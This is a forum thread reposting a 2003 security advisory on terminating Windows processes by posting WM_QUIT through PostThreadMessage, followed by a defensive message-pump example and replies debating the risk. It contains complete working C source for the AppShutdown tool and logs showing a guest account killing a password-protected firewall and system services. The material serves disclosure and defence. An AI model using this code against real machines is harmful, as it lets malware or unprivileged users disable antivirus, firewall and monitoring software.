[security]. Potentially very dangerous.

03/10/2003 - 15:58 by JM Tella Llop [MS MVP] ·
= Process Killing - Playing with PostThreadMessage
= brett.moore@security-assessment.com
= http://www.security-assessment.com
= Originally posted: October 02, 2003

== Background =
While continuing our research into shatter attacks, we turned our
attention to the PostThreadMessage API.

(Start MSDN)
- The PostThreadMessage function places (posts) a message in the message
- queue of the specified thread and then returns without waiting for the
- thread to process the message.
-
- BOOL PostThreadMessage(
- DWORD idThread, // thread identifier
- UINT Msg, // message to post
- WPARAM wParam, // first message parameter
- LPARAM lParam // second message parameter
- );
-
- The function fails if the specified thread does not have a message queue.
- The system creates a thread's message queue when the thread makes its
- first call to one of the Win32 USER or GDI functions.
(End MSDN)

It appears from our testing that any thread running under any security
level will accept a WM_QUIT message, causing the process to terminate.

(Start MSDN)
- WM_QUIT
- The WM_QUIT message indicates a request to terminate an application and
- is generated when the application calls the PostQuitMessage function.
- Return Values
- This message does not have a return value, because it causes the message
- loop to terminate before the message is sent to the application's window
- procedure.
(End MSDN)

Similar results can also be seen in some cases by sending WM_DESTROY or
WM_CLOSE messages instead.

While this does not have the security implications of 'privilege escalation'
attacks, it may cause some concerns under certain circumstances.

For our testing we used a personal firewall that runs as a service and
requires a password before terminating. When run from a guest account,
Appshutdown was able to kill the firewall service and various other Windows
services.

This means that any user has the potential to shut down:
* antivirus applications
* personal firewall applications
* filtering applications
* monitoring applications
* potentially critical system services.

The mitigating factor is that the thread is required to have a message
queue.

== Example Logs =
The test.exe process is the personal firewall that requires a password
before shutting down.

The following logs are shortened outputs of the tlist and kill commands
from the NTRK (Windows NT Resource Kit):
-
C:\>tlist
208 WINLOGON.EXE NetDDE Agent
1020 test.exe TestFirewall
1132 mstask.exe SYSTEM AGENT COM WINDOW

C:\>kill 1020
process test.exe (1020) - 'TestFirewall' killed
C:\>kill 208
process WINLOGON.EXE (208) - 'NetDDE Agent' killed
-

Although kill reports the messages above, what really happened was:
a) the password prompt appeared when trying to kill 1020
b) the service remained running when trying to kill 208

-
C:\>appshutdown "TestFirewall"
% AppShutdown - Playing with PostThreadMessage
% brett.moore@security-assessment.com

+ Finding TestFirewall Window...
+ Found Main Window At...0x30038h
+ Finding Window Thread..0x42ch Process 0x3fch
+ Send Quit Message
+ Done...
C:\>appshutdown "NetDDE Agent"
% AppShutdown - Playing with PostThreadMessage
% brett.moore@security-assessment.com

+ Finding NetDDE Agent Window...
+ Found Main Window At...0x10018h
+ Finding Window Thread..0x110h Process 0xd0h
+ Send Quit Message
+ Done...
-

AppShutdown managed to successfully shut down both services:
a) bypassing the required password for the personal firewall
b) bypassing the security restrictions placed on shutting down services

== Example Code =
/************************************************************************
* Appshutdown.c
*
* Demonstrates the use of PostThreadMessage to:
* - shut down any application with a message handler
*
* The window title can be specified in code or on the command line
*
* Works against any application/service process that
* has implemented a message handler
*
*************************************************************************/
#include <windows.h>
#include <stdio.h>

char tWindow[] = "Windows Task Manager"; // Default name of the main window
char *pWindow;

int main(int argc, char *argv[])
{
    HWND  hWnd;      // handle of the target's main window
    DWORD proc;      // id of the process owning that window
    DWORD hThread;   // id of the thread owning it (the thread with the queue)

    printf("%% AppShutdown - Playing with PostThreadMessage\n");
    printf("%% brett.moore@security-assessment.com\n\n");

    // Specify Window Title On Command Line
    if (argc == 2)
        pWindow = argv[1];
    else
        pWindow = tWindow;

    printf("+ Finding %s Window...\n", pWindow);
    hWnd = FindWindow(NULL, pWindow);
    if (hWnd == NULL)
    {
        printf("+ Couldn't Find %s Window\n", pWindow);
        return 0;
    }
    printf("+ Found Main Window At...0x%lxh\n", (unsigned long)(ULONG_PTR)hWnd);

    printf("+ Finding Window Thread..");
    hThread = GetWindowThreadProcessId(hWnd, &proc);
    if (hThread == 0)
    {
        printf("Failed\n");
        return 0;
    }
    printf("0x%lxh Process 0x%lxh\n", (unsigned long)hThread, (unsigned long)proc);

    printf("+ Send Quit Message\n");
    // Posts WM_QUIT to the thread's queue; the target's message loop sees
    // GetMessage return 0 and exits, exactly as if it had called PostQuitMessage.
    if (!PostThreadMessage(hThread, WM_QUIT, 0, 0))
    {
        printf("+ PostThreadMessage failed, error %lu\n", GetLastError());
        return 1;
    }
    printf("+ Done...\n");
    return 0;
}

== Example Vulnerable Programs =

From our testing, any process that implements a message queue is vulnerable
to being shut down by a user of any security level, in some instances
bypassing shutdown password requirements.
This attack must be run through an interactive logon.

== Credit =
Brett Moore from security-assessment.com

== About Security-Assessment.com =
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, an online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team has previously identified a
number of vulnerabilities in public and private software vendors' products.

Jose Manuel Tella Llop
MS MVP - DTS
jmtella@compuserve.com

This message is provided "as is" without warranties of any kind, and confers no rights.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.
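As an added example (not part of the advisory or of Security-Assessment.com's code): the defensive side of the behaviour described above. The advisory's point is that a message loop exits on WM_QUIT no matter who posted it, so a guarded pump treats WM_QUIT (and WM_CLOSE to the main window) as authoritative only after the process's own shutdown path has authorised it. The QuitGuard type, its functions and the simulated message sequence are assumptions of this example; the real GetMessage loop compiles only under _WIN32, while the guard logic is portable so it can be tested anywhere.

```c
/*
 * quitguard.c: a message pump that ignores a WM_QUIT it did not ask for.
 *
 * GetMessage() returns 0 on WM_QUIT whether the quit came from our own
 * PostQuitMessage() or from another process's PostThreadMessage() aimed at
 * our thread id. So the legitimate shutdown path sets a flag first, and the
 * pump drops (and counts) any WM_QUIT, or WM_CLOSE to the main window, that
 * arrives while the flag is clear. Guard and simulated pump are portable C;
 * the real GetMessage loop compiles only under _WIN32.
 */
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
/* Message numbers copied from winuser.h so the simulation runs off-Windows. */
#define WM_CLOSE 0x0010
#define WM_QUIT  0x0012
#define WM_PAINT 0x000F
#define WM_TIMER 0x0113
#endif

#define SIM_SELF_SHUTDOWN 0xFFFFFFFFu /* simulation marker: own shutdown ran */

typedef struct {
    int      quit_authorised; /* set only by quitguard_authorise() */
    unsigned foreign_quits;   /* WM_QUIT seen while not authorised */
    unsigned foreign_closes;  /* WM_CLOSE seen while not authorised */
} QuitGuard;

void quitguard_init(QuitGuard *g) { memset(g, 0, sizeof *g); }

/* Legitimate shutdown (e.g. after the firewall's password check passed).
   Set the flag BEFORE calling PostQuitMessage() so the pump cannot race it. */
void quitguard_authorise(QuitGuard *g) { g->quit_authorised = 1; }

/* Pump saw WM_QUIT: returns 1 if it may exit, 0 if it must keep running. */
int quitguard_allow_quit(QuitGuard *g)
{
    if (g->quit_authorised) return 1;
    g->foreign_quits++;
    fprintf(stderr, "quitguard: dropping WM_QUIT not requested by us (%u)\n",
            g->foreign_quits);
    return 0;
}

/* Main window got WM_CLOSE: same policy, only our own UI may close us. */
int quitguard_allow_close(QuitGuard *g)
{
    if (g->quit_authorised) return 1;
    g->foreign_closes++;
    return 0;
}

/* Simulated pump over a constructed message sequence. Returns the number of
   messages dispatched; *exited is 1 if the loop ended on an authorised
   WM_QUIT, 0 if it ran out of input still alive. */
unsigned simulate_pump(QuitGuard *g, const unsigned *msgs, unsigned n, int *exited)
{
    unsigned dispatched = 0;
    *exited = 0;
    for (unsigned i = 0; i < n; i++) {
        if (msgs[i] == SIM_SELF_SHUTDOWN) { quitguard_authorise(g); continue; }
        if (msgs[i] == WM_QUIT) {
            if (quitguard_allow_quit(g)) { *exited = 1; return dispatched; }
            continue;                          /* foreign quit: keep pumping */
        }
        if (msgs[i] == WM_CLOSE && !quitguard_allow_close(g)) continue;
        dispatched++;                          /* stands in for DispatchMessage */
    }
    return dispatched;
}

#ifdef _WIN32
/* Real pump. Calling GetMessage again after it returned 0 is fine: the
   WM_QUIT was consumed when it was retrieved. */
int guarded_message_loop(QuitGuard *g)
{
    MSG msg;
    for (;;) {
        BOOL r = GetMessage(&msg, NULL, 0, 0);
        if (r == -1) return 1;                            /* hard error */
        if (r == 0) {
            if (quitguard_allow_quit(g)) return (int)msg.wParam;
            continue;                                     /* dropped quit */
        }
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
}
#endif
```

The advisory's own mitigating factor still applies alongside this: a service thread that never calls USER or GDI functions gets no message queue, so PostThreadMessage to it simply fails.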


#1 Ramón Sola [MS MVP]
04/10/2003 - 01:24
Damn... Now I'm reminded of that article titled "Windows vulnerable for being Windows"...
I don't think there is a very good fix; there could be hundreds or thousands of applications that depend on that "feature" to communicate closes, exits and abrupt terminations to their various components... For example those utilities that let you send any Windows message to a particular window, or even to all of them (the "handle" value HWND_BROADCAST)...
Ramón Sola / Málaga (Spain)
MS MVP (Windows - Shell/User) / http://mvp.support.microsoft.com

Fix Windows before writing to me. ;-)))


JM Tella Llop [MS MVP] · wrote...
> = Process Killing - Playing with PostThreadMessage
> =
> = http://www.security-assessment.com
> = Originally posted: October 02, 2003
>
> == Background =
> While continuing our research into shatter attacks, we turned our
> attention to the PostThreadMessage API.
>
> [...]
#2 José Manuel Agüero
04/10/2003 - 21:46
Hello:

Well, it is well known that a program running on a machine can do a lot of damage regardless of this function. If we don't run malicious programs, what is the security risk of PostThreadMessage? If we do run malicious programs, what does it matter? A malicious program can do many more things.
I suppose it refers to the ability of any virus to stop antivirus programs. From my point of view antivirus programs can easily protect themselves from this risk (or maybe I don't know enough about programming). In fact it is one of the first protections I would have put in. Apart from viruses I don't see what the news is...

Regards.


"JM Tella Llop [MS MVP] ·" wrote in message news:
[...]
#4 JM Tella Llop [MS MVP] ·
04/10/2003 - 22:04
Apart from the possibility of doing anything (this is just one example) for which you don't have local privileges, so that a user of your machine could take control.. the problem also lies in the fact that viruses running from an unprivileged account.. could also do anything.

It's an important issue.

Jose Manuel Tella Llop
MS MVP - DTS


This message is provided "as is" without warranties of any kind, and confers no rights.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"José Manuel Agüero" <jmaguero, cliente de vodafone (es)> wrote in message news:u%
[...]